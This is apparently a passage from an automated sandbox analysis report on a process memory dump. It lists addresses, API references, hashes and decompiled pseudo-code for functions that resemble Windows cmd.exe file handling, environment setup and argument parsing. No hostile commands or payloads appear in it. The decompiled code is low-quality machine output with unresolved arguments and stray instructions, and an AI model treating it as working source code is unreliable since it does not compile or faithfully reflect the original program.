                                  0x0015e5f9
                                  0x0015e5ff
                                  0x0015e602
                                  0x0015e605
                                  0x0015e608
                                  0x0015e60a
                                  0x0015e60f
                                  0x0015e62b
                                  0x0015e62c
                                  0x0015e632
                                  0x0015e637
                                  0x00000000
                                  0x00000000
                                  0x0015e640
                                  0x0016bfcf
                                  0x0016bfd4
                                  0x0016bfdb
                                  0x0016bfdd
                                  0x0016bfe4
                                  0x0016bfe6
                                  0x0016bff7
                                  0x0016bffc
                                  0x0016bffc
                                  0x0016bfe4
                                  0x0016bfff
                                  0x0016c00b
                                  0x00000000
                                  0x0015e656
                                  0x0015e659
                                  0x0015e794
                                  0x00000000
                                  0x0015e65f
                                  0x0015e65f
                                  0x0015e663
                                  0x00000000
                                  0x0015e663
                                  0x0015e659
                                  0x0015e640
                                  0x0015e614
                                  0x0016bea5
                                  0x0016beab
                                  0x0016beab
                                  0x0016beac
                                  0x0016beae
                                  0x0016beae
                                  0x0016beb1
                                  0x0016beb1
                                  0x0016beb1
                                  0x0016beb6
                                  0x0015e621
                                  0x00000000
                                  0x0015e7ad
                                  0x0015e7b0
                                  0x0015e7b4
                                  0x00000000
                                  0x00000000
                                  0x0015e7c4
                                  0x0015e7c6
                                  0x0015e7c8
                                  0x0016bfc5
                                  0x0016bfc5
                                  0x0015e798
                                  0x0015e79f
                                  0x0015e7a0
                                  0x0015e7a1
                                  0x0015e7a2
                                  0x0015e7ac
                                  0x0015e7ac
                                  0x0015e7d3
                                  0x0015e7d9
                                  0x0015e7de
                                  0x0015e7e1
                                  0x0015e7e3
                                  0x00000000
                                  0x00000000
                                  0x0015e7f0
                                  0x0015e7f5
                                  0x0015e7f8
                                  0x0015e7fa
                                  0x00000000
                                  0x00000000
                                  0x0015e805
                                  0x0015e80a
                                  0x0015e80d
                                  0x0015e814
                                  0x0015e667
                                  0x0015e669
                                  0x0015e81d
                                  0x0015e81f
                                  0x0015e827
                                  0x0015e827
                                  0x0015e81f
                                  0x0015e66f
                                  0x0015e673
                                  0x0015e684
                                  0x0015e832
                                  0x0015e836
                                  0x0015e68a
                                  0x0015e691
                                  0x0015e693
                                  0x0015e89d
                                  0x0015e89f
                                  0x0015e8a2
                                  0x0016bebb
                                  0x0016bec2
                                  0x0016bec4
                                  0x0016beca
                                  0x0016becf
                                  0x0016bed3
                                  0x0016bedd
                                  0x0016bee2
                                  0x0016bee4
                                  0x0016bee4
                                  0x0016bec4
                                  0x0015e8a2
                                  0x0015e693
                                  0x0015e69c
                                  0x0015e846
                                  0x0015e846
                                  0x0015e6ab
                                  0x0015e6b9
                                  0x0015e6c1
                                  0x0015e6cc
                                  0x0015e6d1
                                  0x0015e6dc
                                  0x0016beec
                                  0x0015e6e2
                                  0x0015e6e2
                                  0x0015e6e2
                                  0x0015e6f3
                                  0x0016bfc0
                                  0x00000000
                                  0x0015e6f9
                                  0x0015e6fb
                                  0x0016bef6
                                  0x0016bef8
                                  0x0015e76b
                                  0x0015e772
                                  0x0015e778
                                  0x00000000
                                  0x0015e778
                                  0x0015e704
                                  0x0015e721
                                  0x0015e721
                                  0x0015e72d
                                  0x0015e731
                                  0x0015e736
                                  0x0015e742
                                  0x0015e747
                                  0x0015e74d
                                  0x0015e755
                                  0x0016bf4d
                                  0x0016bf52
                                  0x0016bf55
                                  0x0016bf72
                                  0x0016bf72
                                  0x0016bf74
                                  0x0016bf82
                                  0x0016bf84
                                  0x0016bf84
                                  0x0016bf8a
                                  0x0016bf8a
                                  0x0016bf8c
                                  0x00000000
                                  0x00000000
                                  0x0016bf97
                                  0x0015e767
                                  0x0015e767
                                  0x00000000
                                  0x0015e767
                                  0x0016bf5c
                                  0x0016bf62
                                  0x0016bf68
                                  0x0016bf6d
                                  0x0016bf70
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0016bf70
                                  0x0015e75b
                                  0x0015e75f
                                  0x0015e765
                                  0x00000000
                                  0x0015e84e
                                  0x0015e856
                                  0x0015e85b
                                  0x0015e85d
                                  0x00000000
                                  0x00000000
                                  0x0015e866
                                  0x0015e869
                                  0x0015e86e
                                  0x0015e870
                                  0x00000000
                                  0x00000000
                                  0x0015e876
                                  0x0015e87d
                                  0x0015e87f
                                  0x0015e8ad
                                  0x0015e8ad
                                  0x0015e88a
                                  0x0015e88f
                                  0x0015e892
                                  0x00000000
                                  0x0015e898
                                  0x0016bf01
                                  0x0016bf05
                                  0x0016bf1a
                                  0x0016bf1a
                                  0x0016bf21
                                  0x0016bf23
                                  0x0016bf25
                                  0x0016bf25
                                  0x0016bf29
                                  0x0016bf2d
                                  0x0016bf2e
                                  0x0016bf31
                                  0x0016bf36
                                  0x0016bf38
                                  0x00000000
                                  0x0016bf3a
                                  0x0016bf3a
                                  0x0016bf3c
                                  0x0016bf44
                                  0x00000000
                                  0x0016bf44
                                  0x0016bf07
                                  0x0016bf0b
                                  0x0016bf0d
                                  0x0016bf12
                                  0x0016bf14
                                  0x0016bfa2
                                  0x0016bfa9
                                  0x0016bfaf
                                  0x0016bfb2
                                  0x00000000
                                  0x0016bfb2
                                  0x00000000
                                  0x0016bf14
                                  0x0016bf05
                                  0x0015e892
                                  0x0015e704
                                  0x0015e83d
                                  0x0015e83d
                                  0x0015e83d
                                  0x0015e77b
                                  0x0015e781
                                  0x00000000
                                  0x00000000
                                  0x0015e787
                                  0x0015e78b
                                  0x00000000
                                  0x0015e78b
                                  0x0015e673
                                  0x0015e5cb
                                  0x0015e5b0

                                  APIs
                                  • _tell.MSVCRT ref: 0015E5F9
                                  • _close.MSVCRT ref: 0015E62C
                                  • memset.MSVCRT ref: 0015E6CC
                                  • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0015E736
                                  • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00183840), ref: 0015E747
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0015E772
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ConsoleInfoOutput_close_tellmemset
                                  • String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
                                  • API String ID: 1380661413-3584302480
                                  • Opcode ID: e9ab206cae5ac4e355a77841c1f264e264f04711994357907196050cc88693c5
                                  • Instruction ID: a50b94835012bddf13b43d1cdc3dacba55cad9b8267002c4dc25df0063b45c85
                                  • Opcode Fuzzy Hash: e9ab206cae5ac4e355a77841c1f264e264f04711994357907196050cc88693c5
                                  • Instruction Fuzzy Hash: 9FB1A170A08301CBD7289F24DC8472A76E1BF94715F140969EC66DB6A1EB70DE99CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015D120, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 21%
                                  			E0015D120(long __ecx, signed int __edx) {
				void _v8;
				long _v12;
				long _v16;
				long _v20;
				signed int _v24;
				long _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				signed int _t34;
				long _t37;
				void* _t41;
				signed int _t44;
				signed int _t49;
				int _t54;
				signed char _t64;
				void* _t67;
				signed int _t71;
				long _t75;
				void* _t76;
				signed int _t78;
				signed int _t79;
				void* _t81;

				_t65 = __ecx;
				_t75 = 3;
				_v20 = __ecx;
				_t64 = __edx;
				_v16 = 3;
				_t71 = __edx & 0x00000003;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor = 0;
				_v40.nLength = 0xc;
				if(_t71 > 2) {
					L2:
					return _t34 | 0xffffffff;
				}
				_t34 = __edx & 0x00000009;
				if(_t34 != 9) {
					if(_t71 != 0) {
						_t78 = 0x40000000;
						__imp___wcsicmp(__ecx, L"con");
						_t81 = _t81 + 8;
						if(_t34 != 0) {
							_t75 = 1;
							_v16 = 1;
						}
						_t65 = _v20;
						_t37 = 2;
					} else {
						_t78 = 0x80000000;
						_t37 = 3;
					}
					_push(0);
					_push(0x80);
					if(_t64 == 0x10a) {
						_t41 = CreateFileW(_t65, _t78 | 0x80000000, _t75,  &_v40, 3, ??, ??);
						_t76 = _t41;
						if(_t76 != 0xffffffff) {
							goto L9;
						}
						_push(0);
						_push(0x80);
						_push(4);
						_push( &_v40);
						_push(_v16);
						_push(_t78);
						_push(_v20);
						goto L8;
					} else {
						_push(_t37);
						_push( &_v40);
						_push(_t75);
						_push(_t78);
						_push(_t65);
						L8:
						_t41 = CreateFileW();
						_t76 = _t41;
						if(_t76 == 0xffffffff) {
							_t54 = GetLastError();
							 *0x193cf0 = _t54;
							if(_t54 == 0x6e) {
								 *0x193cf0 = 2;
							}
							L28:
							_t44 = _t54 | 0xffffffff;
							L14:
							return _t44;
						}
						L9:
						__imp___open_osfhandle(_t76, 8);
						_t79 = _t41;
						if((_t64 & 0x00000008) != 0) {
							if(E00160178(_t41) != 0) {
								goto L10;
							}
							_t49 = GetFileSize(_t76,  &_v20);
							_v24 = _t49;
							if((_t49 | _v20) == 0) {
								goto L10;
							}
							_v12 = 0xffffffff;
							_v8 = 0;
							if(SetFilePointer(_t76, 0xffffffff,  &_v12, 2) == 0xffffffff) {
								_t54 = GetLastError();
								 *0x193cf0 = _t54;
								if(_t54 == 0) {
									goto L23;
								}
								if(_t79 == 0xffffffff) {
									_t54 = CloseHandle(_t76);
								} else {
									__imp___close(_t79);
								}
								goto L28;
							}
							L23:
							if(ReadFile(_t76,  &_v8, 1,  &_v28, 0) == 0) {
								_v12 = 0;
								SetFilePointer(_t76, 0,  &_v12, 2);
							}
							if(_v8 == 0x1a) {
								_v12 = 0xffffffff;
								SetFilePointer(_t76, 0xffffffff,  &_v12, 2);
							}
						}
						L10:
						_t9 = _t79 - 3; // -3
						_t67 = 0;
						if(_t9 <= 0x5b) {
							if(_t79 > 0x1f) {
								_t33 = _t79 - 0x20; // -32
								_t67 = (_t33 >> 5) + 1;
							}
							asm("bts eax, edx");
						}
						_t44 = _t79;
						goto L14;
					}
				}
				goto L2;
			}
























                                  0x0015d120
                                  0x0015d12a
                                  0x0015d12f
                                  0x0015d132
                                  0x0015d134
                                  0x0015d137
                                  0x0015d139
                                  0x0015d140
                                  0x0015d147
                                  0x0015d151
                                  0x0015d15c
                                  0x00000000
                                  0x0015d15c
                                  0x0015d155
                                  0x0015d15a
                                  0x0015d16a
                                  0x0015d1ea
                                  0x0015d1ef
                                  0x0015d1f5
                                  0x0015d1fa
                                  0x0015d1fc
                                  0x0015d201
                                  0x0015d201
                                  0x0015d204
                                  0x0015d207
                                  0x0015d16c
                                  0x0015d16c
                                  0x0015d171
                                  0x0015d171
                                  0x0015d173
                                  0x0015d175
                                  0x0015d180
                                  0x0015d221
                                  0x0015d227
                                  0x0015d22c
                                  0x00000000
                                  0x00000000
                                  0x0015d232
                                  0x0015d234
                                  0x0015d239
                                  0x0015d23e
                                  0x0015d23f
                                  0x0015d242
                                  0x0015d243
                                  0x00000000
                                  0x0015d186
                                  0x0015d186
                                  0x0015d18a
                                  0x0015d18b
                                  0x0015d18c
                                  0x0015d18d
                                  0x0015d18e
                                  0x0015d18e
                                  0x0015d194
                                  0x0015d199
                                  0x0016b555
                                  0x0016b55b
                                  0x0016b563
                                  0x0016b565
                                  0x0016b565
                                  0x0016b56f
                                  0x0016b56f
                                  0x0015d1de
                                  0x00000000
                                  0x0015d1de
                                  0x0015d19f
                                  0x0015d1a2
                                  0x0015d1ab
                                  0x0015d1b0
                                  0x0015d254
                                  0x00000000
                                  0x00000000
                                  0x0015d25f
                                  0x0015d265
                                  0x0015d26b
                                  0x00000000
                                  0x00000000
                                  0x0015d273
                                  0x0015d27c
                                  0x0015d290
                                  0x0016b577
                                  0x0016b57d
                                  0x0016b584
                                  0x00000000
                                  0x00000000
                                  0x0016b58d
                                  0x0016b59c
                                  0x0016b58f
                                  0x0016b590
                                  0x0016b596
                                  0x00000000
                                  0x0016b58d
                                  0x0015d296
                                  0x0015d2ab
                                  0x0016b5a9
                                  0x0016b5b4
                                  0x0016b5b4
                                  0x0015d2b6
                                  0x0016b5c4
                                  0x0016b5cf
                                  0x0016b5cf
                                  0x0015d2b6
                                  0x0015d1b6
                                  0x0015d1b6
                                  0x0015d1b9
                                  0x0015d1c0
                                  0x0015d1c5
                                  0x0016b5da
                                  0x0016b5e2
                                  0x0016b5e8
                                  0x0015d1d2
                                  0x0015d1d5
                                  0x0015d1dc
                                  0x00000000
                                  0x0015d1dc
                                  0x0015d180
                                  0x00000000

                                  APIs
                                  • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 0015D18E
                                  • _open_osfhandle.MSVCRT ref: 0015D1A2
                                  • _wcsicmp.MSVCRT ref: 0015D1EF
                                  • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,0017F830,00002000), ref: 0015D221
                                  • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 0015D25F
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 0015D287
                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 0015D2A3
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 0016B5B4
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 0016B5CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
                                  • String ID: con
                                  • API String ID: 686027947-4257191772
                                  • Opcode ID: ab547e4b4f560c981ed48ae043fdf4976e5c5de69984ed1d33813734fdd32798
                                  • Instruction ID: 654a1b46882a6a57d0ea96da5cbf5a96088ff341d699594dce54a5a5a7d98e81
                                  • Opcode Fuzzy Hash: ab547e4b4f560c981ed48ae043fdf4976e5c5de69984ed1d33813734fdd32798
                                  • Instruction Fuzzy Hash: 8F51D870A00215EBE7209B68EC89BBE77B8EB45721F14021AFD35EA2D0D7708985C761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015CEA9, Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 167COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E0015CEA9() {
				signed int _v8;
				long _v12;
				char _v16;
				int _v20;
				void _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				WCHAR* _t41;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				void* _t53;
				int _t55;
				void* _t56;
				struct HINSTANCE__* _t78;
				signed int _t79;
				struct HINSTANCE__* _t81;
				void* _t85;
				int* _t88;
				void* _t89;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t96;
				signed int _t98;

				_t30 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t30 ^ _t98;
				_t91 = 0;
				_v12 = 0x104;
				_v20 = 0;
				_v16 = 1;
				memset( &_v540, 0, 0x104);
				if(E00160C70( &_v540, ((0 | _v16 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					do {
						__eflags = E00164B60(__eflags, 0);
					} while (__eflags == 0);
					exit(1);
					L13:
					_t41 =  &_v540;
					L2:
					GetModuleFileNameW(_t91, _t41, _v12);
					if(E0015CFBC(L"PATH") == 0) {
						E00163A50(L"PATH", 0x1524ac);
					}
					if(E0015CFBC(L"PATHEXT") == 0) {
						E00163A50(L"PATHEXT", L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
					}
					_t95 = L"PROMPT";
					if(E0015CFBC(L"PROMPT") == 0) {
						E00163A50(L"PROMPT", L"$P$G");
					}
					if(E0015CFBC(L"COMSPEC") == 0) {
						_t68 = _v20;
						__eflags = _v20;
						if(_v20 == 0) {
							_t68 =  &_v540;
						}
						_t85 = 0x2e;
						_t50 = E0015D7D4(_t68, _t85);
						__eflags = _t50;
						if(_t50 != 0) {
							L33:
							_t86 = _v20;
							__eflags = _v20;
							if(_v20 == 0) {
								_t86 =  &_v540;
							}
							E00163A50(L"COMSPEC", _t86);
							goto L6;
						} else {
							__imp___wcsupr(L"CMD.EXE");
							_t78 = _v20;
							_t96 = _t78;
							__eflags = _t78;
							if(_t78 == 0) {
								_t96 =  &_v540;
							}
							_t88 =  &(_t96->i);
							do {
								_t55 = _t96->i;
								_t96 =  &(_t96->i);
								__eflags = _t55 - _t91;
							} while (_t55 != _t91);
							_t91 = _t78;
							_t95 = _t96 - _t88 >> 1;
							__eflags = _t78;
							if(_t78 == 0) {
								_t91 =  &_v540;
								_t78 = _t91;
							}
							_t89 = 0x5c;
							_t56 = E00162349(_t78, _t89);
							_t79 = _t95 - 1;
							__eflags = _t91 + _t79 * 2 - _t56;
							_t81 = _v20;
							if(_t91 + _t79 * 2 == _t56) {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"CMD.EXE");
							} else {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"\\CMD.EXE");
							}
							E001618C0(_t81, _v12);
							goto L33;
						}
					} else {
						L6:
						_t52 = E0015CFBC(L"KEYS");
						if(_t52 != 0) {
							__imp___wcsicmp(_t52, L"ON");
							__eflags = _t52;
							if(__eflags == 0) {
								 *0x19852c = 1;
							}
						}
						_t73 =  *0x193cb8;
						_t109 =  *0x193cb8;
						if( *0x193cb8 == 0) {
							_t73 = 0x193ab0;
						}
						_t53 = E001633FC(1, _t73, 1, _t91, _t95, _t109);
						__imp__??_V@YAXPAX@Z();
						return E00166FD0(_t53, 1, _v8 ^ _t98, 1, _t91, _t95, _v20);
					}
				}
				_t41 = _v20;
				if(_t41 == 0) {
					goto L13;
				}
				goto L2;
			}




























                                  0x0015ceb4
                                  0x0015cebb
                                  0x0015cecc
                                  0x0015cece
                                  0x0015ced4
                                  0x0015ceda
                                  0x0015cedd
                                  0x0015cf03
                                  0x0016b419
                                  0x0016b41f
                                  0x0016b41f
                                  0x0016b424
                                  0x0016b42a
                                  0x0016b42a
                                  0x0015cf14
                                  0x0015cf19
                                  0x0015cf2d
                                  0x0016b43c
                                  0x0016b43c
                                  0x0015cf41
                                  0x0016b44d
                                  0x0016b44d
                                  0x0015cf47
                                  0x0015cf55
                                  0x0015cfae
                                  0x0015cfae
                                  0x0015cf63
                                  0x0016b457
                                  0x0016b45a
                                  0x0016b45c
                                  0x0016b45e
                                  0x0016b45e
                                  0x0016b466
                                  0x0016b467
                                  0x0016b46c
                                  0x0016b46e
                                  0x0016b4e8
                                  0x0016b4e8
                                  0x0016b4eb
                                  0x0016b4ed
                                  0x0016b4ef
                                  0x0016b4ef
                                  0x0016b4fa
                                  0x00000000
                                  0x0016b470
                                  0x0016b475
                                  0x0016b47c
                                  0x0016b47f
                                  0x0016b481
                                  0x0016b483
                                  0x0016b485
                                  0x0016b485
                                  0x0016b48b
                                  0x0016b48e
                                  0x0016b48e
                                  0x0016b491
                                  0x0016b494
                                  0x0016b494
                                  0x0016b49b
                                  0x0016b49d
                                  0x0016b49f
                                  0x0016b4a1
                                  0x0016b4a3
                                  0x0016b4a9
                                  0x0016b4a9
                                  0x0016b4ad
                                  0x0016b4ae
                                  0x0016b4b3
                                  0x0016b4b9
                                  0x0016b4bb
                                  0x0016b4be
                                  0x0016b4d1
                                  0x0016b4d3
                                  0x0016b4d5
                                  0x0016b4d5
                                  0x0016b4db
                                  0x0016b4c0
                                  0x0016b4c0
                                  0x0016b4c2
                                  0x0016b4c4
                                  0x0016b4c4
                                  0x0016b4ca
                                  0x0016b4ca
                                  0x0016b4e3
                                  0x00000000
                                  0x0016b4e3
                                  0x0015cf69
                                  0x0015cf69
                                  0x0015cf6e
                                  0x0015cf75
                                  0x0016b50a
                                  0x0016b512
                                  0x0016b514
                                  0x0016b51a
                                  0x0016b51a
                                  0x0016b514
                                  0x0015cf7b
                                  0x0015cf81
                                  0x0015cf83
                                  0x0015cfb5
                                  0x0015cfb5
                                  0x0015cf87
                                  0x0015cf8f
                                  0x0015cfa6
                                  0x0015cfa6
                                  0x0015cf63
                                  0x0015cf09
                                  0x0015cf0e
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • memset.MSVCRT ref: 0015CEDD
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 0015CF19
                                    • Part of subcall function 0015CFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0017F830,00002000,?,?,?,?,?,0016373A,0015590A,00000000), ref: 0015CFDF
                                    • Part of subcall function 0015CFBC: _wcsicmp.MSVCRT ref: 0015D005
                                    • Part of subcall function 0015CFBC: _wcsicmp.MSVCRT ref: 0015D01B
                                    • Part of subcall function 0015CFBC: _wcsicmp.MSVCRT ref: 0015D031
                                    • Part of subcall function 0015CFBC: _wcsicmp.MSVCRT ref: 0015D047
                                    • Part of subcall function 0015CFBC: _wcsicmp.MSVCRT ref: 0015D05D
                                    • Part of subcall function 0015CFBC: _wcsicmp.MSVCRT ref: 0015D073
                                    • Part of subcall function 0015CFBC: _wcsicmp.MSVCRT ref: 0015D085
                                    • Part of subcall function 0015CFBC: _wcsicmp.MSVCRT ref: 0015D09B
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0015CF8F
                                  • exit.MSVCRT ref: 0016B424
                                  • _wcsupr.MSVCRT ref: 0016B475
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                  • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                  • API String ID: 2336066422-4197029667
                                  • Opcode ID: 0ad9f08c68e029771dba20d05aa96989caa0b8e2576715e12a54f8f6c8af9fdb
                                  • Instruction ID: d28b534c62ea2c2e6f55000aaa03fce8d106b0dbf71e5ca4cd8ebc1c64011744
                                  • Opcode Fuzzy Hash: 0ad9f08c68e029771dba20d05aa96989caa0b8e2576715e12a54f8f6c8af9fdb
                                  • Instruction Fuzzy Hash: 2C51F531B04219DBDF18DB618C956BE7376AF60305B00446EEC27EB282DF349E99C780
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015EA40, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 413COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E0015EA40(signed short* __ecx, wchar_t* __edx, signed int _a4) {
				long _v8;
				signed int _v12;
				long _v16;
				wchar_t* _v20;
				long _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				long _v236;
				char* _v260;
				char _v264;
				wchar_t* _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				signed int _t79;
				signed short _t81;
				signed int _t82;
				long _t83;
				wchar_t* _t85;
				signed char _t86;
				signed int _t87;
				int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				long _t94;
				signed int _t96;
				signed int _t104;
				signed int _t105;
				void* _t108;
				signed int _t109;
				signed int _t110;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				long _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				wchar_t* _t126;
				intOrPtr _t127;
				signed int _t128;
				signed int _t129;
				void* _t130;
				long _t134;
				wchar_t* _t135;
				wchar_t* _t136;
				signed int* _t137;
				intOrPtr* _t138;
				signed short* _t143;
				long _t144;
				long _t145;
				signed int _t150;
				signed int _t158;
				signed int _t159;
				long _t160;
				long _t164;
				void* _t169;
				signed int _t172;
				long _t173;
				signed int _t177;
				void* _t179;
				signed int _t180;
				signed int _t183;
				signed short* _t185;
				signed short* _t186;
				long _t187;
				signed int* _t188;
				signed int _t190;
				signed int _t191;
				void* _t193;

				_t167 = __edx;
				_t138 = __ecx;
				_t73 =  *0x17d0b4; // 0x3dd0c51d
				_v12 = _t73 ^ _t191;
				_t186 = __ecx;
				_t136 = __edx;
				if(__ecx == 0) {
					_t139 = 4;
					_t75 = E001600B0(4);
					__eflags = _t75;
					if(_t75 != 0) {
						goto L23;
					} else {
						E00179287(4);
						__imp__longjmp(0x18b8b8, 1);
						goto L95;
					}
				} else {
					_t2 = _t138 + 2; // 0x2
					_t179 = _t2;
					do {
						_t127 =  *_t138;
						_t138 = _t138 + 2;
					} while (_t127 != 0);
					_t139 = 4 + (_t138 - _t179 >> 1) * 4;
					_t128 = E001600B0(4 + (_t138 - _t179 >> 1) * 4);
					_v236 = _t128;
					if(_t128 == 0) {
						L95:
						E00179287(_t139);
						__imp__longjmp(0x18b8b8, 1);
						goto L96;
					} else {
						_v228 = _t128;
						_t185 = L"=,;";
						_t129 = 0;
						_v220 = 0;
						while(1) {
							_t164 =  *_t185 & 0x0000ffff;
							_v224 = _t164;
							if(_t164 == 0) {
								break;
							}
							if(_t136 == 0) {
								L9:
								 *(_t191 + _t129 * 2 - 0xd4) = _t164;
								_t129 = _t129 + 1;
								_v220 = _t129;
							} else {
								_t135 = wcschr(_t136, _t164);
								_t193 = _t193 + 8;
								_t129 = _v220;
								if(_t135 == 0) {
									_t164 = _v224;
									goto L9;
								}
							}
							_t185 =  &(_t185[1]);
							if(_t129 < 0x63) {
								continue;
							}
							break;
						}
						_t183 = _v228;
						_t130 = _t129 + _t129;
						if(_t130 >= 0xc8) {
							E0016711D(_t130, _t136, _t164, _t179, _t183, _t186);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t191);
							_push(_t136);
							_push(_t186);
							_v264 = 0;
							_push(_t183);
							__eflags = 0;
							_v260 =  &_v264;
							_t136 = E0015E9A0(0, 0);
							_v268 = _t136;
							goto L62;
						} else {
							_v224 = 1;
							 *((short*)(_t191 + _t130 - 0xd4)) = 0;
							_t134 =  *_t186 & 0x0000ffff;
							_v220 = 1;
							if(_t134 != 0) {
								_t144 = _t134;
								L14:
								if(_t144 == 0x22) {
									L17:
									_v224 = 0;
									if(_t136 == 0) {
										L19:
										 *_t180 =  *_t186;
										_t180 = _t180 + 2;
										if( *_t186 == 0x22) {
											while(1) {
												_t81 = _t186[1];
												_t143 = _t186;
												_t186 =  &(_t186[1]);
												 *_t180 = _t81;
												_t180 = _t180 + 2;
												_t82 =  *_t186 & 0x0000ffff;
												__eflags = _t82;
												if(_t82 == 0) {
													break;
												}
												__eflags = _t82 - 0x22;
												if(_t82 == 0x22) {
													goto L20;
												} else {
													__eflags = _t186[1];
													if(_t186[1] != 0) {
														continue;
													} else {
														goto L20;
													}
												}
												goto L22;
											}
											_t186 = _t143;
										}
										L20:
										_v220 = 0;
									} else {
										_t85 = wcschr(_t136,  *_t186 & 0x0000ffff);
										_t193 = _t193 + 8;
										if(_t85 != 0) {
											_t86 = _a4;
											__eflags = _t86 & 0x00000002;
											if((_t86 & 0x00000002) != 0) {
												__eflags = _v220;
												_t87 =  *_t186 & 0x0000ffff;
												if(_v220 == 0) {
													_t180 = _t180 + 2;
												}
												 *_t180 = _t87;
												_v220 = 1;
												_t180 = _t180 + 4;
											} else {
												__eflags = _t86 & 0x00000004;
												if((_t86 & 0x00000004) != 0) {
													 *_t180 =  *_t186;
												}
												_v220 = 0;
												_t180 = _t180 + 2;
											}
										} else {
											goto L19;
										}
									}
									_t83 = _t186[1] & 0x0000ffff;
									_t186 =  &(_t186[1]);
									_t144 = _t83;
									if(_t83 != 0) {
										goto L14;
									}
								} else {
									_t89 = iswspace(_t144);
									_t193 = _t193 + 4;
									if(_t89 != 0) {
										L24:
										_t90 = _a4;
										__eflags = _t90 & 0x00000001;
										if((_t90 & 0x00000001) != 0) {
											__eflags = _v224;
											if(_v224 == 0) {
												goto L17;
											} else {
												goto L25;
											}
										} else {
											L25:
											_t91 = _t90 & 0x00000002;
											__eflags = _t91;
											_v228 = _t91;
											if(_t91 == 0) {
												L28:
												_t93 = _a4 & 0x00000004;
												__eflags = _t93;
												_v232 = _t93;
												if(_t93 != 0) {
													L96:
													_t79 = E0015D7D4(_t136,  *_t186);
													__eflags = _t79;
													if(_t79 != 0) {
														goto L17;
													} else {
														goto L29;
													}
												} else {
													L29:
													_t94 =  *_t186 & 0x0000ffff;
													__eflags = _t94;
													if(_t94 != 0) {
														_t160 = _t94;
														while(1) {
															__eflags = _t160 - 0x22;
															if(_t160 == 0x22) {
																break;
															}
															_t114 = iswspace(_t160);
															_t193 = _t193 + 4;
															__eflags = _t114;
															if(_t114 != 0) {
																L39:
